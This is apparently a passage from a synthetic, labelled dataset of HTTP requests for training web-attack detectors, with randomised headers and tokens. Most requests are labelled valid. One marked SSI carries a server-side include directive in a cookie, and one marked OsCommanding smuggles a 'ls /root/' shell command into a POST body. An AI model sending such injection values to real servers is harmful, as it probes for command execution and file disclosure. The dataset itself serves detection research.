Cookie2: $Version="18"
Date: Wed, 01 Apr 09 11:45:13 CET
ETag: W/"soakEDI7uEqLVoLk@M"
Expect: bcZe=stMl
From: 4qmTaq3m@xens.uk
If-Modified-Since: Sat, 19 Sep 09 02:54:44 CET
If-Unmodified-Since: Fri, 12 Jun 09 12:54:42 CET
If-Match: "CoABRlvId.GAcfwfPBG"
If-None-Match: *
If-Range: "VmaVthEd0g6cQj0"
Max-Forwards: 5912
MIME-Version: 1.6
Pragma: f7r=rv
Proxy-Authorization: Digest response="eFaFDEbfbED7Ace2E02FFEf6ee2a8BAF"
Authorization: Digest response="0f74cB9A31d93EfDB1eE52e21ed3c7FF"
Range: 0-91,8335-51366
Referer: /ihTik6Or/rwipetlc/ical/no6unes6.sh
TE: deflate,trailers,gzip;q=0.1
Trailer: Connection
User-Agent: Mozilla/9.3 (Windows; U; WinNT 8.8; tH-go; rv:9.2.0) Gecko/62943365
UA-CPU: MIPS
UA-Disp: 845,505,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 337x1386
Via: r7g/1.8 209.201.106.177, 3.2 67.199.112.34
Transfer-Encoding: compress
Upgrade: slh/6.3
Warning: 996 www.oioeoa.png "henuSrMevtewo9Rnoa2h" "Sun, 29 Nov 09 11:37:16 CET"
X-Forwarded-For: 233.242.107.236
X-Serial-Number: 77802
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3521
Start - Id: 11865
class: Valid
GET /fmU3QbYgIDj8Ch4J/OpZAi/Qxp_..likeuvbscript3epAaxF/h.xh6CWJVrUformidb/2slaldttmqpk/e6naX7.tiff? HTTP/1.1
Host: 225.192.57.235
Connection: Rrrrnel
Accept: text/html;q=0.8, video/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=191
Client-ip: 253.123.138.51
Cookie: eodo5=tceeatriqtN;em=oe5srbedaaB1yOlA;nekea=5683;Oe6awojn70tu=hhtpass;2ewit=Rga=t
Cookie2: $Version="718"
Date: Thu, 26 Nov 09 14:37:42 UTC
ETag: W/"63D0fXxNEmQl@u3M_yXu"
Expect: eo6ITna=f0lro7h;mqmonjt
From: letI@hnH5isut.cz
If-Modified-Since: Wed, 22 Sep 04 05:58:23 GMT
If-Unmodified-Since: Tue, 09 Oct 07 11:33:53 CET
If-Match: *
If-None-Match: "dACY@Jn1l4UmY-c8"
If-Range: "YBh-cxJ35xk4M9vX3ook"
Max-Forwards: 4
MIME-Version: 7.4
Pragma: eso9=c4i
Proxy-Authorization: hnLol ueohtIwr=wHldEo
Authorization: Basic TnJhYjpyZWltc3ZsTA==
Range: -486
Referer: http://aeahw.org/5Hotsltr/azihsdnu/ptppit29/ei0nzhec.swf
TE: chunked;q=0.7,gzip;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/7.3 (compatible; mh4uasT; Linux i586; Sshrtqkwtm; tlousfiso; attgoeTn)
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 872x2543
Via: 6.7 240.118.241.121, HTTP/1.5 223.98.8.34, 4.9 www.yie3.jpg:8331
Transfer-Encoding: identity
Upgrade: tbiaud/7.8
Warning: 165 174.179.176.135:93465 "taieryl3onnp5cttaanx" "Wed, 31 Dec 08 04:33:55 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 02595980702101510
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11865
Start - Id: 28346
class: Valid
GET /uyY.gif?rysotoWii=tat1np1oselect5iyam&awu=5&bh=tibg&M8H-=el+wnEbinkEartpeob&tbsyt=eX_&HR5z-k54=dild4r4&Rl7z3wnotvo=yheotwo&nr=rrao%3Ar&l1hsi=ptr&uc28hcaih03=aa HTTP/1.1
Host: 154.218.4.240
Connection: tTdI
Accept: application/*;q=0.3
Accept-Charset: x-mac-korean
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 27.241.91.89
Cookie: loe=5%EiNyoE=2;dSt=EEeaccept
Cookie2: $Version="872"
Date: Fri, 27 Jan 06 18:56:59 UTC
ETag: W/"qD4qO5j69cAqerG"
Expect: 100-continue
From: nicserws@tdhtrrpo.net
If-Modified-Since: Wed, 25 Mar 09 18:23:41 UTC
If-Unmodified-Since: Sat, 31 Dec 05 06:28:29 GMT
If-Match: "ae7GRja41vl9-ZJa7a"
If-None-Match: "BhTd7CDul9oxrpYubL"
If-Range: Wed, 11 May 05 21:04:00 CET
Max-Forwards: 5
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic bmhycGhuVzp0Y2VUYnB0dA==
Authorization: Basic YXlvYWhhdDpkc2dFcGxhYw==
Range: 2735-73,95-
Referer: /ts6t/erwiro/imYlu/4x7rIsic.swf
TE: deflate;q=0.3,chunked,trailers
Trailer: Accept-Language
User-Agent: inlicen (taQtay9P8; mf0sWdH; t-C5W6Ei; mi8HWC)
UA-CPU: StrongARM
UA-Disp: 547,716,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 084x4486
Via: 4.5 222.154.68.230, 0.5 www.5idWajy.shtml, 7.2 229.27.41.144
Transfer-Encoding: compress
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 820 33.84.92.164 "ltswrjre0O2fta" 
X-Forwarded-For: 214.238.31.113
X-Serial-Number: 4245119888
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28346
Start - Id: 14686
class: Valid
GET /hm0execzUUoptSM/rhueysenwhezclcys/tztnekMltaxrgm/ashVD8Pql932a233oqHJ/ndEXyBdwpc78D.bin?processing-instructionO7PjcJHf-group by=i8u&eE=107itt7Sr5wRM8lI&EmEqS=110&lbITamn8=71339&iedesSr=10083&tez=caFe6yoihIt&dsxeaEowifhpooq=0820 HTTP/1.0
Host: 255.191.217.80
Connection: keep-alive
Accept: application/*;q=0.9, video/quicktime;q=0.0
Accept-Charset: x-mac-ce, hz-gb-2312;q=0.7, cp-936;q=0.0, windows-1258;q=0.4, iso-8859-15;q=0.3
Accept-Encoding: gzip;q=0.5, compress;q=0.6, compress;q=0.8, gzip;q=0.1, compress
Accept-Language: OEalevt-shWrzfi
Cache-Control: c9nsp=qB81oice
Client-ip: 13.86.30.219
Cookie: ses7dgt6b=i6t;iuN=n4Oy2;s5ttw4ezyle=eeqsxoiebi;eRiw=hva;7Ongruyta2rae9=76;wpoimiIRyeGA7=sHyiesTl" iy"?sta
Cookie2: $Version="0"
Date: Sat, 03 May 08 12:00:13 UTC
ETag: "uHBn0QQncCl0QP7G0hfy"
Expect: yapnsalx=ezf0t0n;h9uen
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Wed, 21 Jan 04 07:07:40 GMT
If-Unmodified-Since: Fri, 18 Sep 09 14:51:01 UTC
If-Match: *
If-None-Match: "PznovYQ1AeCq0UG"
If-Range: Sun, 06 Mar 05 24:47:51 CET
Max-Forwards: 09
MIME-Version: 3.3
Pragma: Tcoo3ac='NiH'
Proxy-Authorization: EOoh Ellxd=Dta1et4X
Authorization: diph o6e7nrh=seescnoe
Range: 07-
Referer: http://www.oelowuf8.cz/nE3etn/e6Ihsii/eh5iee2.shtml
TE: chunked
Trailer: Date
User-Agent: n4tebe/8.3
UA-CPU: Sparc
UA-Disp: 1207,004,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0368x227
Via: 3.2 11.226.227.247
Transfer-Encoding: qEop; 3lqGe=dsdg
Upgrade: f01ie/0.8
Warning: 475 255.62.238.61 "aoneo" 
X-Forwarded-For: 90.226.61.85
X-Serial-Number: 5935364150091795
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 14686
Start - Id: 1857
class: Valid
GET /qew/sdinrhogzhsbt2hdSvo/e6F/eaaRzr/120b/Caccess_logRpx/saioih/ole.msf?6cA=907&As509r=var1inHt&oMextsieta7F=3234496&hsmoE8hvbjet=tCe1R&teeniieaLHnia=lcn&AnEirg=24569&ni1Cat=fxtermhtEE8oeiistdin&JxhY_H0a9_Z=5&pxhc=6rqpwz&fo=7ob+%29t&kGsp=ssr&b1H4rea=+tnaiASh6ne HTTP/1.1
Host: www.mth3ia9wd.cz:4
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress, compress;q=0.1, deflate;q=0.7, deflate;q=0.3
Accept-Language: ny-e;q=0.0, rehose-tFhbyh95;q=0.1, eStubI9-oRx;q=0.3, taAtFs-ndt;q=0.0
Cache-Control: max-age=04864
Client-ip: 188.102.222.214
Cookie: bbrasw1=1;Q1y2updateJEd7P=lQc0fs@ZcFOI;ena7enc=94630664;ye4=9798;ori=629108
Cookie2: $Version="36"
Date: Mon, 18 Sep 06 15:57:45 GMT
ETag: "hcdtO9lIu6b.w2vVC1"
Expect: 100-continue
From: utOro@brnnglI.fr
If-Modified-Since: Wed, 20 Jul 05 09:31:20 GMT
If-Unmodified-Since: Thu, 04 Mar 04 19:47:34 CET
If-Match: "gYBpIwmCTe98FA2g"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 9.5
Pragma: flrhs0sa=ao
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: NTLM cUh0bWdzaHRkTG5mc2ZEZmV6aXR4b2Vobm9vaG5pYWEyZUM=
Range: -34624,61390-055,75119-
Referer: http://aatmeenu.gov/eiIeul/47tts.dll
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/3.4 (Windows; U; Win 9x 7.3; eo-oh; rv:3.4.7) Gecko/41202088
UA-CPU: PowerPC
UA-Disp: 171,774,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 063x9656
Via: FTP/4.3 www.eeItha1.jpeg, 5.0 www.lumxirHU.js:02, 5.9 www.fd8oS8l.jpeg
Transfer-Encoding: identity
Upgrade: ue0/2.4, itqt5/5.4, 6Erms/1.3
Warning: 195 79.247.8.91 "v9omtairreetwatxt" 
X-Forwarded-For: 120.197.169.25
X-Serial-Number: 0502244013679080099
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1857
Start - Id: 39155
class: SSI
GET /etteacthstndee0gi/59e/9wisao7rnltbtqC/6@/ezMbvO3z30_C0VHuG-yh/ti0I22so2N.1ug_yv/kGxi/gs/h7mD/xsupdoknanls1pitnie/izbaIcPI0tjhgWwL2Z/ee.aspx?xh0et=jtasmubzepD6ai&eseonoserzRr=i+h8lttOugroup+byunioneforml&bnl2ncos=sQJ&3P=wvsqSZHmR&onEtcneecs=processing-instruction6&nrnhsc=e%40.49IWVsA0&eesincaeaariob=svitIl HTTP/1.1
Host: www.nbw4n.cz:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.4, gzip;q=0.8, identity, compress;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 211.72.120.217
Cookie: vEa=tryh;olyisnguiSecefo=etnuemktdvoScAOtl;imdcpse0=unew;aa=qhNie;ytti9Ad=<!--#echo var="date_gmt"-->;ndiwAeeoNd=17965
Cookie2: $Version="68"
Date: Sun, 21 Feb 10 10:32:06 CET
ETag: W/"ZHnd7fqGl_H.gppZJp"
Expect: 100-continue
From: ectdj@6rt19rcai.com
If-Modified-Since: Mon, 27 Mar 06 21:01:47 GMT
If-Unmodified-Since: Sat, 24 Dec 05 05:40:44 UTC
If-Match: *
If-None-Match: "hD7AuL5JPb2ECW3shw"
If-Range: Sat, 10 Dec 05 22:57:08 GMT
Max-Forwards: 78
Pragma: no-cache
Proxy-Authorization: Digest cnonce="7nsypmlL"
Authorization: NTLM dXZ5czFyaHB0Ylp0c3M5ZWVpbm5nMHFzSFRwZWllYTFvYWRkaHRxZW9u
Range: -6701
Referer: /geent/oonRanPt/Snh4t/twtl.doc
TE: chunked
Trailer: Connection
User-Agent: VooahMirp/7.2
UA-CPU: StrongARM
UA-Disp: 9926,2237,8
UA-OS: Solaris
UA-Pixels: 308x434
Via: 8.0 www.zsSqO.gif:582
Transfer-Encoding: gzip
Upgrade: sNrPh/3.1, DArw/8.8, seEv0h/6.6
Warning: 430 218.56.203.53 "ebsaieatngcc1Ede" 
X-Forwarded-For: 3.217.212.81
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39155
Start - Id: 8824
class: Valid
GET /hh2fug/mfO/eB0eNizB/niWZ0.gUsxvg9L1JJXqb/irrkUXAncngn/iaau2iroameQr/ncdZ6P/y47SQKUT48_t/.zcMlIG/BMDMbM3DPsJP/aaoiceronbnvandit0t/tOfzcVvLCZ.htm?qhc7=scehnspicIjisnR&rgTvrlsBsntq=0667173760&i0c6rsoL8wusd=+ew&IebAdrt8coasrf=415&XautoexechciBlh=%29it&sxpnrud7u=lmnhole HTTP/1.1
Host: www.suaA9.be:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1258, x-mac-turkish;q=0.5, ks_c_5601-1987;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: warredx='v59tft06'
Client-ip: 31.116.162.106
Cookie: ilA2axh=eT;ydRSsa=wD@2b;read=oesmzEttjxu;nohhDvO=TtvdgwrNotl;eruiodr=50277
Cookie2: $Version="30"
Date: Thu, 14 Dec 06 23:27:08 UTC
ETag: W/"UR3sW-PaYGURfJZ"
Expect: 100-continue
From: 5srce@e7dwmH6lp.fr
If-Modified-Since: Mon, 11 May 09 18:09:44 UTC
If-Unmodified-Since: Thu, 03 Dec 09 14:54:40 CET
If-Match: "c5ttpGU1phETaJY8"
If-None-Match: "9CX-U1THMM36thfpIUy9"
If-Range: *
Max-Forwards: 0
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: Digest qop=auth
Range: 9-,10-,-403711
Referer: /ioxtoTr/sfcrf/fuue/n6l5e5it.exe
TE: trailers,trailers,deflate;q=0.2
Trailer: If-Match
User-Agent: Mozilla/5.0 (X11; U; Unix 1.3; ee-pn; rv:6.5.2) Gecko/48193742
UA-CPU: Sparc
UA-Disp: 0735,834,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 939x576
Via: 7.2 www.ewoy.html:323, nbev/9.8 www.Rtln4.shtml
Transfer-Encoding: deflate
Upgrade: ocwua/7.0, sAmh/4.1
Warning: 807 156.138.181.44 "ytoyeafaneodeoactli" 
X-Forwarded-For: 150.199.226.92
X-Serial-Number: 28573562
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8824
Start - Id: 31737
class: Valid
GET /r2-uCW6XDvB12kP9jf/t3aaarit/Wh6Yuiwrbwifot/wnnennnmtle7e/eEootbn/lcu7itDA4JE8@PsIpUBf/oixedzeaso1Qhe/1oietsedN8hm/agisODtmo/hGT6ZKl24xn6c.c11_z/1r.jpg?NZ36openP=yRQU1pV8gR&tu0=482190&neyR28moethtaht=282860&lTenltdhintco=8&ljre=pr+eheiioiEsnm&fiemIOwhhhtG2r=e7YjlcEXK.&trhhbwnsth=ez&LRpasswdPrGU=ba05hi-C8x HTTP/1.1
Host: 160.118.130.240
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=36023
Client-ip: 213.193.145.220
Cookie: mzqiaaoZ=anlreasNllietheq;tseetdsL=v;Tsecw=7375384;oa3aNc=tsH+ex)locationenfnph-
Cookie2: $Version="50"
Date: Sun, 30 Aug 09 19:35:08 GMT
ETag: "QpCH@I9C6tX3q6U4vK"
Expect: mi8u
From: hSnrwf@ca6hdgec.biz
If-Modified-Since: Thu, 06 Dec 07 15:06:17 CET
If-Unmodified-Since: Sun, 15 Feb 09 14:21:42 UTC
If-Match: "FAcgZRUSkWC4ODQH"
If-None-Match: *
If-Range: *
Max-Forwards: 1295
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM dHRzVmZ2cm1oeHRjc2lsdGtudHR0aXA3MG5vdHNlZG0=
Authorization: Digest realm
Range: 5077-46,223-
Referer: /mirmeo/tolo/o97awre/eeotrb/rttwne.png
TE: deflate,chunked;q=0.4
Trailer: If-Range
User-Agent: eTlnjwnlrm/8.5.9.8.6
UA-CPU: PowerPC
UA-Disp: 574,324,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 751x460
Via: HTTP/6.5 21.78.236.27, FTP/0.3 www.zhes5er.css:108, 2n4e/1.6 www.qsaza.gif:343
Transfer-Encoding: deflate
Upgrade: Nesagu/1.4
Warning: 655 www.5ege.shtml "eqstpn1youlwhxc" "Thu, 03 Jan 08 01:44:00 UTC"
X-Forwarded-For: 135.18.20.109
X-Serial-Number: 48619214669
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31737
Start - Id: 30221
class: Valid
GET /hOfee5atrddeoogaaoe/FlCceX@.tiff?inHlors=wXao&CPNqHViM=137735&ezot=esret%3F9eai&arraasxsma=%7C%3Eemochai+%5B%5Ck&aeixasUOsou11=oT&2ordDeclca=eiisbhminUatfxn HTTP/1.0
Host: www.hatt.com
Connection: y0u8r
Accept: audio/*, application/x-tar, audio/basic;q=0.8
Accept-Charset: *
Accept-Encoding: compress, gzip, deflate;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 175.252.217.28
Cookie: nhzrD=42;OXXformV= ;bar=&0awindow.openncs+4netcatue;s0ste382mo=39591;nnintoeynug=5t8;ufalahyoBhiv=oitTd0dsaa7libcro9
Cookie2: $Version="0"
Date: Sat, 22 May 04 23:20:32 GMT
ETag: W/"qZR5zHuy_j.jpzx"
Expect: 100-continue
From: mkyl6h4a@vano2thq.be
If-Modified-Since: Tue, 04 Sep 07 03:29:24 CET
If-Unmodified-Since: Mon, 26 Jun 06 10:29:10 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Oct 07 15:17:59 CET
Max-Forwards: 04
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: cauv rfTcyhia=lorfye
Authorization: Digest opaque="d9tdu2s"
Range: 346642-698,469-394,8-
Referer: http://www.hechiwsw.gov/htertis/rTn7iRa/rlWt/sdlz.swf
TE: trailers,gzip;q=0.9
Trailer: Authorization
User-Agent: nlJehyi/8.1.2.7
UA-CPU: PowerPC
UA-Disp: 058,5611,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8300x7095
Via: 2.3 www.itesbX.gif, h5pmfa/5.1 www.3ae8eoOr.jpeg
Transfer-Encoding: compress
Upgrade: eftf/4.4, ddnAte/3.1
Warning: 579 185.81.167.241 "3i0d" "Wed, 17 Jan 07 24:46:17 CET"
X-Forwarded-For: 73.235.101.244
X-Serial-Number: 19194011026
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 30221
Start - Id: 391
class: Valid
GET /l-pAflM-2-i1oK/hXqEggaR/PmC6Tb4FX.nsf?oNdn1nixr=7443084&bFpgM-Ctelnet2=oraJdCdkaasp&hiOneosa3dqtno=hse%7Eetonxl%2Fwindow.open7oslewsp&aptow5tUI7eRe=22401&4M.Lov4wopt=9401&aa=nahesn&-o1HUyEXfFP=ielin0rt&zckHeWeaX5-G=%29s3connects&uedm=1&ocnaof3ufe=nshutdownor&lXaxhragwlas=k&inn=e0agbC&tiMI=167994&hnyEerahaaseD=3 HTTP/1.1
Host: www.hcwDmme.ch
Connection: close
Accept: video/mpeg, image/gif, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: od-MoeueyoR;q=0.2, Toa-ittn7
Cache-Control: atB=sint
Client-ip: 80.119.213.130
Cookie: h0must1a9utettE=967;mcDX.11V4=329;aangOixbW8m2e=7727397;voetdas=yxOdter d
Cookie2: $Version="53"
Date: Mon, 02 Feb 09 13:02:58 CET
ETag: "8gtH4ZMRmT1hoBRlDk"
Expect: caxlro
From: mery8@lusi.gov
If-Modified-Since: Fri, 26 Mar 04 12:13:37 CET
If-Unmodified-Since: Fri, 29 Aug 08 14:39:22 CET
If-Match: "PHx_aFUk5Db_t1OCvIB"
If-None-Match: "b158mBWCKlB6B6X02W6"
If-Range: *
Max-Forwards: 5
MIME-Version: 5.4
Pragma: hprt3sln=tQtne5de
Proxy-Authorization: Digest nonce
Authorization: NTLM OWhubmxlbmExbG5hbHR0eXJ1dHloYWRsb2VtZWFkeWxuaXJ5NGxpaWFjb2Rh
Range: 63476-77033,-529,5-
Referer: /7atPu/meaIet/endhbnl/pvoaLn.gif
TE: deflate;q=0.8,trailers
Trailer: Range
User-Agent: o7tndw
UA-CPU: x86
UA-Disp: 8170,9079,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7545x2141
Via: fdomeE/3.7 101.150.144.126, 2.7 142.136.203.47, 3.8 www.dahn.js
Transfer-Encoding: nerOea; fibEt2ly=ohmktT
Upgrade: sajgfN/7.8, n2wam/2.4
Warning: 990 183.31.90.109 "igbAcaoD3vs" 
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 5470041402
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 391
Start - Id: 27688
class: Valid
GET /u0H/sYkVsELQVBPwUoK7m9/tmdniaegu9tctRasqEbe/ezbL8ASgNUIOwGBL8wOW/essan5eod/7j7G/IGAtLo@TR/a0@FI/ijitqe8daneoeY92ysqe.jpg?liomPlthnh=maSoi&hda=zNtldad+d5e+w&AEadqpMz1iX=twget&fL6dodreen3=Wyaaconnectie&SanaeFhOEac=ckUwyOjb.&i9eege=quY.&jnrueisuei=bl3%29eNnt%3Asyi&4d=uhm-e&acvC=348&ki9585iTtrsha3r=737943&nsilpel=+5t8c&rtwvatl05e=4809&tsd=34%40ox3 HTTP/1.0
Host: 97.226.216.243
Connection: exo2yn
Accept: application/*;q=0.7, application/x-tar
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 163.4.168.12
Cookie: Hn8deei=5857445;UTqb=gnet;aLl=8eqperlvh3iehtaccesgos tamtstdinl;Hoanw=  dia3ee3ausrnode[
Cookie2: $Version="23"
Date: Thu, 03 Aug 06 18:34:47 GMT
ETag: W/"jjbn.BcKvzk8oUEXzB33"
Expect: ee4re=lemXfen
From: sSue@OaasXm.net
If-Modified-Since: Thu, 21 May 09 15:50:21 UTC
If-Unmodified-Since: Fri, 20 Jun 08 12:09:36 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 46
MIME-Version: 9.8
Pragma: ymhEelIA='aEasHsu'
Proxy-Authorization: Basic b3BhdW02YWw6dmNoaw==
Authorization: NTLM YXk0dHdhd3dlaGk3bUlJbHJsZm9TMnJkRWw2eXNvZW5zbHltZU9zbm1DZw==
Range: 716735-,44690-4,8-024480
Referer: /ujahq6r/eewru/ovnGlay/hrsrSdi/Bboe.wav
TE: gzip,trailers,chunked
Trailer: Range
User-Agent: exA-JEp http://www.tejn.be
UA-CPU: 68000
UA-Disp: 9899,7417,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 1357x8118
Via: 3.0 www.iHtsi.css, nhye/5.8 www.ar4dotao.htm, 1.9 15.105.188.87:7602
Transfer-Encoding: identity
Upgrade: 7tihjo/8.0, sel/5.7, yAiesw/1.4
Warning: 853 www.ne9heunk.jpeg "jt0uaenrtwnLgah3l" "Sun, 30 Sep 07 15:57:29 GMT"
X-Forwarded-For: 24.95.0.215
X-Serial-Number: 9842192214995
----: -----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27688
Start - Id: 29688
class: Valid
GET /nnp/aGm-TAE9fd8.x6/i6e9aTn.jpeg?9e4e=h-&nceoyeeuflLe=t7l0eqscatv&ltoot=31sfh%7Cnb&abh=5t&ln=966&Iiutfkzgiafd=AoToO&rtcthcne9xH=nfiefhatiscdcs HTTP/1.0
Host: www.hetctsrain.cz
Connection: keep-alive
Accept: text/plain, application/*
Accept-Charset: cp-932;q=0.2, windows-1251
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 210.96.241.160
Cookie: enTneriE6=5;Uqiqutssbesi=o8n@rRPbX
Cookie2: $Version="561"
Date: Sat, 25 Jul 09 11:58:42 UTC
ETag: "nRjbnO40tq3kjyt-AR"
Expect: 100-continue
From: icqca@mi5a7iM.cz
If-Modified-Since: Wed, 12 Jul 06 14:02:37 CET
If-Unmodified-Since: Wed, 01 Apr 09 18:18:41 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 8.9
Pragma: uvjurtrt=bayret
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: Digest uri=http://13asrde.be/ootwG8yg/nea8ein/moania/iovte/ee0Rq.jsp
Range: -551432,8-
Referer: http://www.nnhadRu.gov/4tlpw5/piwsf.sh
TE: trailers,gzip
Trailer: Accept
User-Agent: g5s4QAubLL http://www.cas8m.st
UA-CPU: MIPS
UA-Disp: 0427,819,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8055x615
Via: 7.7 11.182.164.7
Transfer-Encoding: TSae
Upgrade: vdqdss/4.7, wsibnl/9.2
Warning: 634 www.heiixDa.html:23 "eesheuoaeAepggkenat" "Thu, 13 Nov 08 12:05:34 CET"
X-Forwarded-For: 199.28.138.89
X-Serial-Number: 149051815209
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29688
Start - Id: 43056
class: OsCommanding
POST /pY2Kl3AQdaOT.lib/c75pcin0jsieadrWs/iE7wnceahuyruie8rl/ew7Mr_0VPTjFWH.msf? HTTP/1.0
Content-Length: 201
Content-Language: 7wpMcfa,eCaW,pef9eii
Content-Encoding: compress
Content-Location: /kratr/escusdis.conf
Content-MD5: Y3RyZWhkc3l0SHREaGh0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Apr 10 16:30:08 UTC
Last-Modified: Sat, 08 Jul 06 24:33:46 GMT
Host: 37.27.30.126
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mao0niro-edirsEs, al7maa-ngt;q=0.4, e-Hr, ed8H9o-Sqthh;q=0.5
Cache-Control: min-fresh=5
Client-ip: 255.33.171.132
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="392"
Date: Sun, 14 Feb 10 20:05:21 UTC
ETag: "CkQ3nAB.xUzhBzs5jox_"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Thu, 14 Jul 05 21:28:45 UTC
If-Unmodified-Since: Sun, 28 Jun 09 02:18:18 UTC
If-Match: "QL1Ivc@iqjP4N6rHlA8"
If-None-Match: *
If-Range: Fri, 07 Apr 06 12:26:30 CET
Max-Forwards: 6
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: NTLM NDVQeXNkaEh1OHNvdGttZTlpdnFhbW5pb25yamFueElvZmF0VXRvZGU0
Range: -324,1-544,8-732
Referer: /teRpt4r.php3
TE: deflate
Trailer: Accept
User-Agent: 9pEswhZlm http://www.nmtpSH.ch
UA-CPU: 68000
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 7.8 www.Ttio1g.htm, FTP/1.2 www.T3ranl6r.css
Transfer-Encoding: deflate
Upgrade: tun3o/7.3, omna/4.0
Warning: 822 www.eio8o.jpg "ftuhtoaegstt66xnrce" "Tue, 28 Jul 09 22:26:56 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 13504238814
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

meAuehEetl=xp_r&beoj5tls=\nls  /root/&l57gs=7orpkor:&aE0l=1184629&tfexvlae=14479171&ltsaobsaselnc=j6sp&systemWJ3echozYj9.pr=Oehavingd&eaip=oo&rsetyftNno=vecrorcrOouryto&wwUNrr10=updateShe&mt=31

End - Id: 43056
Start - Id: 16253
class: Valid
GET /oseweda/eggstjmtiu2oxzd/uzT4rnint4otoa2grsx.asp?atsam3tnkaytot=13045372&btzdeodsnmf=f+daa&D.openIiqxULVGd=0r&mEtsa9dek1s=EcaA%26elocation1&1rdEXSAdpc2c=422558&PHt@1BhKfpR=saar HTTP/1.1
Host: www.enacKetdco.ch:80
Connection: hetn
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: compress, gzip, identity;q=0.4, compress;q=0.3, identity
Accept-Language: wmcnDs-bqU
Cache-Control: only-if-cached
Client-ip: 252.250.241.161
Cookie: bcT0=7;so1mDAtyti=4;dat5ttVc7=Eenkhmeu;Aaiieldtte=ere6safTwfI
Cookie2: $Version="3"
Date: Wed, 20 Aug 08 24:51:01 CET
ETag: W/"xNt8NPfOH10qUQS4hs@6"
Expect: dlaR8Oyp=nka2o;eywn
From: Tcnle@algheiet.net
If-Modified-Since: Fri, 10 Dec 04 01:48:49 GMT
If-Unmodified-Since: Fri, 30 Dec 05 09:05:56 GMT
If-Match: *
If-None-Match: "sgDu8EMA7BGX3KCc7ku3"
If-Range: Tue, 08 Jul 08 14:05:33 GMT
Max-Forwards: 6616
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic aWVBbWE6VWRnZXNw
Authorization: Basic Nmx0aWhpeTpFaW9nOQ==
Range: 820-,56899-18941
